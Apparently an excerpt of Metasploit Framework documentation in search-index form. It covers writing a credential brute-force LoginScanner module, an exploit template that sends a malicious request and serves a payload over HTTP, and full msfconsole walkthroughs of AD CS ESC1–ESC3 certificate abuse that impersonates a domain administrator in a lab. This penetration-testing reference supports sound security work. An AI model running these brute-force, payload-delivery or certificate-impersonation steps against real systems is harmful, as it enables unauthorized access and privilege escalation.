    "url": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-3-start-with-a-loginscanner-template",
    "relUrl": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-3-start-with-a-loginscanner-template"
  },"435": {
    "doc": "Writing a HTTP LoginScanner",
    "title": "Step 4: Write the auxiliary module",
    "content": "The auxiliary module acts more like an user-interface. You describe what the module does, handles options, initializes objects, and do reporting. A basic auxiliary module template in our case would be something like this: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'metasploit/framework/login_scanner/symantec_web_gateway' require 'metasploit/framework/credential_collection' class MetasploitModule &amp;lt; Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'Symantec Web Gateway Login Utility', 'Description' =&amp;gt; %q{ This module will attempt to authenticate to a Symantec Web Gateway. }, 'Author' =&amp;gt; [ 'sinn3r' ], 'License' =&amp;gt; MSF_LICENSE, 'DefaultOptions' =&amp;gt; { 'RPORT' =&amp;gt; 443, 'SSL' =&amp;gt; true, 'SSLVersion' =&amp;gt; 'TLS1' } ) ) end def run_host(ip) end end . Save it under modules/auxiliary/scanner/http/. Our main method is #run_host, so we’ll begin there. But before we do, we must initialize your LoginScanner object. The following is an example of how you will probably write it. def scanner(ip) @scanner ||= lambda { cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], pass_file: datastore['PASS_FILE'], password: datastore['PASSWORD'], user_file: datastore['USER_FILE'], userpass_file: datastore['USERPASS_FILE'], username: datastore['USERNAME'], user_as_pass: datastore['USER_AS_PASS'] ) return Metasploit::Framework::LoginScanner::SymantecWebGateway.new( configure_http_login_scanner( host: ip, port: datastore['RPORT'], cred_details: cred_collection, stop_on_success: datastore['STOP_ON_SUCCESS'], bruteforce_speed: datastore['BRUTEFORCE_SPEED'], connection_timeout: 5 )) }.call end . Notice that this scanner method can be called multiple times, but the use of lambda will allow the LoginScanner object to initialize only once. After that first time, every time the method is called, it will just return @scanner instead of going through the whole initialization process again. In some cases you might need to pass more datastore options, maybe not. For example, if you want to allow the URI to be configurable (which is also already an accessor in Metasploit::Framework::LoginScanner::HTTP), then you have to create and pass datastore[‘URI’] to configure_http_login_scanner too, like so: . uri: datastore['URI'] . And then in your LoginScanner, pass uri to #send_request: . send_request({'uri'=&amp;gt;uri}) . At this point, the scanner method holds our Metasploit::Framework::LoginScanner::SymantecWebGateway object. If we call the #scan! method, it will trigger the #attempt_login method we wrote earlier, and then yield the Result object. Basically like this: . scanner(ip).scan! do |result| # result = Our Result object end . With the Result object, we can start reporting. In most cases, you will probably be using #create_credential_login to report a successful login. And use #invalidate_login to report a bad one. Reporting a valid credential . The credential API knows a lot about a credential, such as when it was used, how it was used, serviced tried, target IP, port, etc, etc. So when we report, that’s how much information we are storing for every credential. To make credential reporting easy to use, all you need to do is call the #store_valid_credential method like this: . store_valid_credential( user: result.credential.public, private: result.credential.private, private_type: :password, # This is optional proof: nil, # This is optional ) . Report an invalid credential . Here’s another example you can use: . # Reports a bad credential. # # @param [String] ip Target host # @param [Fixnum] port Target port # @param [Result] The Result object # @return [void] def report_bad_cred(ip, rport, result) invalidate_login( address: ip, port: rport, protocol: 'tcp', public: result.credential.public, private: result.credential.private, realm_key: result.credential.realm_key, realm_value: result.credential.realm, status: result.status, proof: result.proof ) end . At this point, you’re pretty much done with the auxiliary module. It will probably look something like this: https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb . ",
    "url": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-4-write-the-auxiliary-module",
    "relUrl": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-4-write-the-auxiliary-module"
  },"436": {
    "doc": "Writing a HTTP LoginScanner",
    "title": "Test",
    "content": "And finally, make sure your module actually works. Test for a successful login: . msf auxiliary(symantec_web_gateway_login) &amp;gt; run [+] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Success: 'sinn3r:GoodPassword' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(symantec_web_gateway_login) &amp;gt; . Test for a failed login: . msf auxiliary(symantec_web_gateway_login) &amp;gt; run [-] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Failed: 'sinn3r:BadPass' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(symantec_web_gateway_login) &amp;gt; . ",
    "url": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#test",
    "relUrl": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#test"
  },"437": {
    "doc": "Writing a HTTP LoginScanner",
    "title": "Writing a HTTP LoginScanner",
    "content": "This is a step-by-step guide on how to write a HTTP login module using the latest LoginScanner and Credential APIs. Before we begin, it’s probably a good idea to read Creating Metasploit Framework LoginScanners, which explains about the APIs in-depth. The LoginScanner API can be found in the lib/metasploit/framework/loginscanner directory, and the Credential API can found as a metasploit-credential gem here. You will most likely want to read them while writing the login module. ",
    "url": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html",
    "relUrl": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html"
  },"438": {
    "doc": "How to write a module using HttpServer and HttpClient",
    "title": "How to write a module using HttpServer and HttpClient",
    "content": "Using multiple networking mixins in a Metasploit module is always a tricky thing to do, because most likely you will run into issues like overlapping datastore options, variables, methods, the super call is only meant for one mixin, etc. This is considered as advanced module development, and sometimes can be rather painful to figure out on your own. To improve the Metasploit development experience, we have a few examples to demonstrate common scenarios that require you to use multiple mixins to achieve exploitation. Today’s lesson: Send a HTTP request to attack the target machine, and use a HttpServer for payload delivery. Say you want to exploit a web server or web application. You have code execution on the box, but you need to find a way to deliver the final payload (probably an executable), and a HTTP server happens to be your option. Here is how you can set it up: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &amp;lt; Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'HttpClient and HttpServer Example', 'Description' =&amp;gt; %q{ This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time, but this allows the HttpServer to terminate after a delay. }, 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ 'sinn3r' ], 'References' =&amp;gt; [ ['URL', 'http://metasploit.com'] ], 'Payload' =&amp;gt; { 'BadChars' =&amp;gt; \"\\x00\" }, 'Platform' =&amp;gt; 'win', 'Targets' =&amp;gt; [ [ 'Automatic', {} ], ], 'Privileged' =&amp;gt; false, 'DisclosureDate' =&amp;gt; '2013-12-09', 'DefaultTarget' =&amp;gt; 0 ) ) register_options( [ OptString.new('TARGETURI', [true, 'The path to some web application', '/']), OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]) ], self.class ) end def on_request_uri(cli, req) print_status(\"#{peer} - Payload request received: #{req.uri}\") send_response(cli, 'You get this, I own you') end def primer print_status(\"Sending a malicious request to #{target_uri.path}\") send_request_cgi({ 'uri' =&amp;gt; normalize_uri(target_uri.path) }) end def exploit Timeout.timeout(datastore['HTTPDELAY']) { super } rescue Timeout::Error # When the server stops due to our timeout, this is raised end end . Here’s what happens when you run the above example: . | The super call wrapped in the Timeout block will start the web server. | Before the web server is in the infinite loop state, the primer() method is called, which is where you send your malicious requests to get code execution. | Your HttpServer serves the final payload upon request. | After 10 seconds, the module raises a Timeout exception. The web server finally terminates. | . In case you’re wondering why the web server must terminate after a period of time, this is because if the module fails to gain code execution on the target machine, obviously it will never ask your web server for the malicious payload, therefore there is no point to keeping it alive forever. Typically it shouldn’t take a very long time to get a payload request, either, so we keep the timeout short. The output for the above example should look something like this: . msf exploit(test) &amp;gt; run [*] Exploit running as background job. [*] Started reverse handler on 10.0.1.76:4444 [*] Using URL: http://0.0.0.0:8080/SUuv1qjZbCibL80 [*] Local IP: http://10.0.1.76:8080/SUuv1qjZbCibL80 [*] Server started. [*] Sending a malicious request to / msf exploit(test) &amp;gt; [*] 10.0.1.76 test - 10.0.1.76:8181 - Payload request received: /SUuv1qjZbCibL80 [*] Server stopped. msf exploit(test) &amp;gt; . Related Articles: . | How to Send an HTTP Request Using HTTPClient | How to write a browser exploit using HttpServer | https://community.rapid7.com/community/metasploit/blog/2012/12/17/metasploit-hooks | . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-write-a-module-using-httpserver-and-httpclient.html",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-write-a-module-using-httpserver-and-httpclient.html"
  },"439": {
    "doc": "XOR Support",
    "title": "How to XOR with Metasploit::Framework::Compiler",
    "content": "The Metasploit C compiler has built-in support for XOR encoding and decoding, which is implemented as the xor.h header. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-xor-with-metasploit-framework-compiler.html#how-to-xor-with-metasploitframeworkcompiler",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-xor-with-metasploit-framework-compiler.html#how-to-xor-with-metasploitframeworkcompiler"
  },"440": {
    "doc": "XOR Support",
    "title": "Code Example",
    "content": "#include &amp;lt;Windows.h&amp;gt; #include &amp;lt;String.h&amp;gt; #include &amp;lt;xor.h&amp;gt; int main(int args, char** argv) { char* xorStr = \"NNNN\"; char xorKey = 0x0f; LPVOID lpBuf = VirtualAlloc(NULL, sizeof(int) * strlen(xorStr), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memset(lpBuf, '\\0', strlen(xorStr)); xor((char*) lpBuf, xorStr, xorKey, strlen(xorStr)); MessageBox(NULL, lpBuf, \"Test\", MB_OK); return 0; } . To compile, use Metasploit::Framework::Compiler::Windows.compile_c . ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-xor-with-metasploit-framework-compiler.html#code-example",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-xor-with-metasploit-framework-compiler.html#code-example"
  },"441": {
    "doc": "XOR Support",
    "title": "XOR Support",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-xor-with-metasploit-framework-compiler.html",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-xor-with-metasploit-framework-compiler.html"
  },"442": {
    "doc": "Zip",
    "title": "How to zip files with Msf::Util::EXE.to_zip",
    "content": "Compressing files into zip format is very easy with Metasploit. For most purposes, you can use Msf::Util::EXE.to_zip() to compress data into a zip file. Note that the former Rex::Zip::Archive() should no longer be used. ",
    "url": "/docs/development/developing-modules/libraries/how-to-zip-files-with-msf-util-exe-to_zip.html#how-to-zip-files-with-msfutilexeto_zip",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-zip-files-with-msf-util-exe-to_zip.html#how-to-zip-files-with-msfutilexeto_zip"
  },"443": {
    "doc": "Zip",
    "title": "Usage:",
    "content": "files = [ {data: 'AAAA', fname: 'test1.txt', comment: 'my comment'}, {data: 'BBBB', fname: 'test2.txt'} ] zip = Msf::Util::EXE.to_zip(files) . If saved as a file, the above example will extract to the following: . $ unzip test.zip Archive: test.zip extracting: test1.txt extracting: test2.txt . ",
    "url": "/docs/development/developing-modules/libraries/how-to-zip-files-with-msf-util-exe-to_zip.html#usage",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-zip-files-with-msf-util-exe-to_zip.html#usage"
  },"444": {
    "doc": "Zip",
    "title": "Zip",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/how-to-zip-files-with-msf-util-exe-to_zip.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-zip-files-with-msf-util-exe-to_zip.html"
  },"445": {
    "doc": "Request certificates",
    "title": "Vulnerable Application",
    "content": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate template’s configuration the resulting certificate can be used for various operations such as authentication. PFX certificate files that are saved are encrypted with a blank password. This module is capable of exploiting ESC1, ESC2, ESC3 and ESC13. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#vulnerable-application",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#vulnerable-application"
  },"446": {
    "doc": "Request certificates",
    "title": "Module usage",
    "content": ". | From msfconsole | Do: use auxiliary/admin/dcerpc/icpr_cert | Set the CA, RHOSTS, SMBUser and SMBPass options | Run the module and see that a new certificate was issued or submitted | . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#module-usage"
  },"447": {
    "doc": "Request certificates",
    "title": "Options",
    "content": "CA . The target certificate authority. The default value used by AD CS is $domain-DC-CA. CERT_TEMPLATE . The certificate template to issue, e.g. “User”. ADD_CERT_APP_POLICY . Add certificate application policy OIDs to the certificate. The ability to add policy OIDs to the certificate is dependent on it’s configuration. More than one OID can be specified, separated by spaces, ;, or ,. Some useful OIDs for this purpose include: . | 1.3.6.1.4.1.311.20.2.2 – Smart Card Logon | 1.3.6.1.5.2.3.4 – PKINIT Client Authentication | 1.3.6.1.5.5.7.3.1 – Server Authentication | 1.3.6.1.5.5.7.3.2 – Client Authentication | 1.3.6.1.5.5.7.3.3 – Code Signing | 1.3.6.1.4.1.311.20.2.1 – Certificate Request Agent | . ALT_DNS . Alternative DNS name to specify in the certificate. Useful in certain attack scenarios. ALT_SID . Alternative object SID to specify in the NTDS_CA_SECURITY_EXT extension. This is useful when exploiting ESC1 on a target where the KB5014754 patch has been applied. See the following resources for more information. | https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7 | https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d | . ALT_UPN . Alternative User Principal Name (UPN) to specify in the certificate. Useful in certain attack scenarios. This is in the format $username@$dnsDomainName. PFX . Certificate to request on behalf of. This is a PKCS12 file (using the .pfx extension), such as a one generated by previously running this module. ON_BEHALF_OF . Username to request on behalf of. This is in the format $domain\\\\$username. DigestAlgorithm . This is an advanced option. The digest algorithm to use for cryptographic signing operations. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#options",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#options"
  },"448": {
    "doc": "Request certificates",
    "title": "Actions",
    "content": "REQUEST_CERT . Request a certificate. The certificate PFX file will be stored on success. The certificate file’s password is blank. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#actions",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#actions"
  },"449": {
    "doc": "Request certificates",
    "title": "Scenarios",
    "content": "Obtaining Configuration Values . For this module to work, it’s necessary to know the name of a CA and certificate template. These values can be obtained by a normal user via LDAP. msf6 &amp;gt; use auxiliary/gather/ldap_query msf6 auxiliary(gather/ldap_query) &amp;gt; set BIND_DN [email protected] BIND_DN =&amp;gt; [email protected] msf6 auxiliary(gather/ldap_query) &amp;gt; set BIND_PW Password1! BIND_PW =&amp;gt; Password1! msf6 auxiliary(gather/ldap_query) &amp;gt; set ACTION ENUM_AD_CS_CAS ACTION =&amp;gt; ENUM_AD_CS_CAS msf6 auxiliary(gather/ldap_query) &amp;gt; run [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local CN=msflab-DC-CA CN=Enrollment Services CN=Public Key Services CN=Services CN=Configuration DC=msflab DC=local ============================================================================================================= Name Attributes ---- ---------- cacertificatedn CN=msflab-DC-CA, DC=msflab, DC=local certificatetemplates ESC1-Test || Workstation || ClientAuth || DirectoryEmailReplication || DomainControllerAuthentication || KerberosAuthentication || EFSRecovery || EFS || DomainController || WebServer || Machine || User || SubCA | Administrator cn msflab-DC-CA dnshostname DC.msflab.local name msflab-DC-CA [*] Auxiliary module execution completed msf6 auxiliary(gather/ldap_query) &amp;gt; . Issue A Generic Certificate . In this scenario, an authenticated user issues a certificate for themselves using the User template which is available by default. The user must know the CA name, which in this case is msflab-DC-CA. msf6 &amp;gt; use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser aliddle SMBUser =&amp;gt; aliddle msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass Password1! SMBPass =&amp;gt; Password1! msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA msflab-DC-CA CA =&amp;gt; msflab-DC-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE User CERT_TEMPLATE =&amp;gt; User msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol [*] 192.168.159.10:445 - Binding to \\cert... [+] 192.168.159.10:445 - Bound to \\cert [*] 192.168.159.10:445 - Requesting a certificate... [+] 192.168.159.10:445 - The requested certificate was issued. [*] 192.168.159.10:445 - Certificate UPN: [email protected] [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125053_default_unknown_windows.ad.cs_545696.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Issue A Certificate With A Specific subjectAltName (AKA ESC1) . In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate for a different User Principal Name (UPN), typically one that is an administrator. Exploiting this misconfiguration to specify a different UPN effectively issues a certificate that can be used to authenticate as another user. If the target server has the KB5014754 patch applied and the REG_DWORD HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc\\StrongCertificateBindingEnforcement value is set to 2, then the SID for the account with the specified UPN should be supplied as well. In November of 2023, Microsoft will change the default value of StrongCertificateBindingEnforcement to 2. If the server has the patch applied, the SID will be returned in the issued certificate which ensures that the required strong mapping is in place. If the strong mapping is required and the SID is not specified in the certificate, then Kerberos authentication will fail with KDC_ERR_CERTIFICATE_MISMATCH. The user must know: . | A vulnerable certificate template, in this case ESC1-Test. | The SID of a target account, in this case S-1-5-21-3402587289-1488798532-3618296993-1000 | The UPN of a target account, in this case [email protected]. | . See Certified Pre-Owned section on ESC1 for more information. msf6 &amp;gt; use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser aliddle SMBUser =&amp;gt; aliddle msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass Password1! SMBPass =&amp;gt; Password1! msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA msflab-DC-CA CA =&amp;gt; msflab-DC-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC1-Test CERT_TEMPLATE =&amp;gt; ESC1-Test msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000 ALT_SID =&amp;gt; S-1-5-21-3402587289-1488798532-3618296993-1000 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ALT_UPN [email protected] ALT_UPN =&amp;gt; [email protected] msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set VERBOSE true VERBOSE =&amp;gt; true msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol [*] 192.168.159.10:445 - Binding to \\cert... [+] 192.168.159.10:445 - Bound to \\cert [*] 192.168.159.10:445 - Requesting a certificate for user aliddle - alternate UPN: [email protected] - digest algorithm: SHA256 - template: ESC1-Test [+] 192.168.159.10:445 - The requested certificate was issued. [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000 [*] 192.168.159.10:445 - Certificate UPN: [email protected] [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20230608111432_default_192.168.159.10_windows.ad.cs_029062.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Issue A Certificate With The Any Purpose EKU (AKA ESC2) . In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate from a template that either contains the Any Purpose EKU or no EKUs at all. The user must know: . | A vulnerable certificate template, in this case ESC2-Test. | A target account, in this case MSFLAB\\smcintyre. | . See Certified Pre-Owned section on ESC2 for more information. Step 1 . The first step is to issue a certificate using the vulnerable certificate template. msf6 &amp;gt; use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser aliddle SMBUser =&amp;gt; aliddle msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass Password1! SMBPass =&amp;gt; Password1! msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA msflab-DC-CA CA =&amp;gt; msflab-DC-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC2-Test CERT_TEMPLATE =&amp;gt; ESC2-Test msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol [*] 192.168.159.10:445 - Binding to \\cert... [+] 192.168.159.10:445 - Bound to \\cert [*] 192.168.159.10:445 - Requesting a certificate... [+] 192.168.159.10:445 - The requested certificate was issued. [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Step 2 . The second step is to run the module a second time, using the certificate template to request a certificate on behalf of the target user. The CERT_TEMPLATE option is updated to one allowing authentication such as the default User template. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set PFX /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx PFX =&amp;gt; /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ON_BEHALF_OF MSFLAB\\\\smcintyre ON_BEHALF_OF =&amp;gt; MSFLAB\\smcintyre msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE User CERT_TEMPLATE =&amp;gt; User msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol [*] 192.168.159.10:445 - Binding to \\cert... [+] 192.168.159.10:445 - Bound to \\cert [*] 192.168.159.10:445 - Building certificate request on behalf of MSFLAB\\smcintyre [*] 192.168.159.10:445 - Requesting a certificate... [+] 192.168.159.10:445 - The requested certificate was issued. [*] 192.168.159.10:445 - Certificate UPN: [email protected] [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107153713_default_unknown_windows.ad.cs_275853.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Issue A Certificate With The Certificate Request Agent EKU (AKA ESC3) . In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate from a template that either contains the Certificate Request Agent EKU. The user must know: . | A vulnerable certificate template, in this case ESC3-Test. | A target account, in this case MSFLAB\\smcintyre. | . The steps are identical to ESC2. First a certificate is requested using the vulnerable template. Then it is used to request another certificate on behalf of the target account. Step 1 . The first step is to issue a certificate using the vulnerable certificate template. msf6 &amp;gt; use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser aliddle SMBUser =&amp;gt; aliddle msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass Password1! SMBPass =&amp;gt; Password1! msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA msflab-DC-CA CA =&amp;gt; msflab-DC-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC3-Test CERT_TEMPLATE =&amp;gt; ESC3-Test msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol [*] 192.168.159.10:445 - Binding to \\cert... [+] 192.168.159.10:445 - Bound to \\cert [*] 192.168.159.10:445 - Requesting a certificate... [+] 192.168.159.10:445 - The requested certificate was issued. [*] 192.168.159.10:445 - Certificate UPN: [email protected] [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Step 2 . The second step is to run the module a second time, using the certificate template to request a certificate on behalf of the target user. The CERT_TEMPLATE option is updated to one allowing authentication such as the default User template. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set PFX /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx PFX =&amp;gt; /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ON_BEHALF_OF MSFLAB\\\\smcintyre ON_BEHALF_OF =&amp;gt; MSFLAB\\smcintyre msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE User CERT_TEMPLATE =&amp;gt; User msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol [*] 192.168.159.10:445 - Binding to \\cert... [+] 192.168.159.10:445 - Bound to \\cert [*] 192.168.159.10:445 - Building certificate request on behalf of MSFLAB\\smcintyre [*] 192.168.159.10:445 - Requesting a certificate... [+] 192.168.159.10:445 - The requested certificate was issued. [*] 192.168.159.10:445 - Certificate UPN: [email protected] [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107154740_default_unknown_windows.ad.cs_567059.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#scenarios"
  },"450": {
    "doc": "Request certificates",
    "title": "Request certificates",
    "content": " ",
    "url": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html"
  },"451": {
    "doc": "Kerberos",
    "title": "Kerberos",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/",
    "relUrl": "/docs/pentesting/active-directory/kerberos/"
  },"452": {
    "doc": "AD CS",
    "title": "AD CS",
    "content": " ",
    "url": "/docs/pentesting/active-directory/ad-certificates/",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/"
  },"453": {
    "doc": "Active Directory",
    "title": "Active Directory",
    "content": " ",
    "url": "/docs/pentesting/active-directory/",
    "relUrl": "/docs/pentesting/active-directory/"
  },"454": {
    "doc": "Pentesting",
    "title": "Pentesting",
    "content": " ",
    "url": "/docs/pentesting/",
    "relUrl": "/docs/pentesting/"
  },"455": {
    "doc": "Basics",
    "title": "Basics",
    "content": " ",
    "url": "/docs/using-metasploit/basics/",
    "relUrl": "/docs/using-metasploit/basics/"
  },"456": {
    "doc": "Getting Started",
    "title": "Getting Started",
    "content": " ",
    "url": "/docs/using-metasploit/getting-started/",
    "relUrl": "/docs/using-metasploit/getting-started/"
  },"457": {
    "doc": "Meterpreter",
    "title": "Meterpreter",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/meterpreter/",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/"
  },"458": {
    "doc": "RPC",
    "title": "RPC",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/RPC/",
    "relUrl": "/docs/using-metasploit/advanced/RPC/"
  },"459": {
    "doc": "Advanced",
    "title": "Advanced",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/",
    "relUrl": "/docs/using-metasploit/advanced/"
  },"460": {
    "doc": "Oracle Support",
    "title": "Oracle Support",
    "content": " ",
    "url": "/docs/using-metasploit/other/oracle-support/",
    "relUrl": "/docs/using-metasploit/other/oracle-support/"
  },"461": {
    "doc": "Other",
    "title": "Other",
    "content": " ",
    "url": "/docs/using-metasploit/other/",
